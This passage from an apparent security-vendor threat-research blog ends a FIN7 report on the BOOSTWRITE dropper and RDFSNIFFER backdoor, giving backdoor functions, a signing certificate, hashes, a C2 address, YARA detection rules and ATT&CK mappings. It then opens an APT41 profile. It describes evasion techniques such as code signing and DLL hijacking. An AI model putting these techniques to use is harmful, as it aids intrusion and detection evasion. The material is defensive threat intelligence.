      Retrieves a file from the remote system

      Execute

      RunCommand

      3001

      Executes a command on the remote system

      DeleteRemote

      FileMgrDeleteFile

      3019

      Deletes file on remote system

      DeleteLocal

      -

      -

      Deletes a local file

      Table 2: RDFSNIFFER’s Backdoor Functions

      Signed: Yours Truly, FIN7

      While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).

      MD5

      Organization

      Country

      Serial

      a67d6e87283c34459b4660f19747a306

      mango ENTERPRISE LIMITED

      GB

      32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

      Table 3: Code signing certificate used for BOOSTWRITE

      This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).


      Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

      Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

      Outlook and Implications

      While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

      Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

      While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.

      Type

      Indicator(s)

      BOOSTWRITE (signed)

      MD5: a67d6e87283c34459b4660f19747a306
      SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84
      SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

      C2: 109.230.199[.]227

      BOOSTWRITE (unsigned)

      MD5: af2f4142463f42548b8650a3adf5ceb2
      SHA1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
      SHA256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

      C2: 109.230.199[.]227

      Table 4: Publicly-shareable BOOSTWRITE samples

      The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.

      Timestamp

      Description

      2019-05-20 09:50:55 UTC

      Signed BOOSTWRITE’s PE compilation time

      2019-05-22 00:00 UTC
      through
      2020-05-21 23:59 UTC

      Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window

      Table 5: Relevant executabe timestamps

      A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

      pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):
           pe.signatures[i].valid_on(pe.timestamp)

      Figure 3: Excerpt of NCC Group’s research Yara rule

      There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.



      Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

      FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

      To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.

      F:\projects\DWriteImpl\Release\DWriteImpl.pdb

      Figure 5: BOOSTWRITE PDB path

      The Yara rule template can be applied to result in the quick rule in Figure 6.

      rule ConventionEngine_BOOSTWRITE
      {
       meta:
           author = "Nick Carr (@itsreallynick)"
           reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
      strings:
           $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
       condition:
           (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB
      }

      Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

      We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

      rule Exports_BOOSTWRITE
      {
      meta:
           author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
      strings:
           $exyPants = "DWriteImpl.dll" nocase
      condition:
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB
      }

      Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

      Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.

      Platform

      Signature Name

      Endpoint Security

      MalwareGuard ML detection (unsigned variants)

      Network Security and Email Security

      Malware.binary.dll (dynamic detection)
      MalwareGuard ML detection (unsigned variants)
      APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
      APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
      FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
      FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

      Table 6: FireEye detection matrix

      Don’t Sweat the Techniques – MITRE ATT&CK Mappings

      BOOSTWRITE

      ID

      Tactic

      BOOSTWRITE Context

      T1022

      Data Encrypted

      BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

      T1027

      Obfuscated Files or Information

      BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

      T1038

      DLL Search Order Hijacking

      BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

      T1116

      Code Signing

      BOOSTWRITE variants were observed signed by a valid CA

      T1129

      Execution through Module Load

      BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

      T1140

      Deobfuscate/Decode Files or Information

      BOOSTWRITE decodes its payloads at runtime using using a ChaCha stream cipher with a 256-bit key and 64-bit IV

      RDFSNIFFER

      ID

      Tactic

      RDFSNIFFER Context

      T1106

      Execution through API

      RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

      T1107

      File Deletion

      RDFSNIFFER has the capability of deleting local files

      T1179

      Hooking

      RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

      Acknowledgements

      The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

      APT41: A Dual Espionage and Cyber Crime Operation

      Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

      The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

      Who Does APT41 Target?

      Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

      The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

      Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

      A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

       


      Figure 1: Timeline of industries directly targeted by APT41

      Probable Chinese Espionage Contractors

      Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

      Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


      Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

      The Right Tool for the Job

      APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

      APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

      Fast and Relentless

      APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

      The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

      Looking Ahead

      APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

      Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

      APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.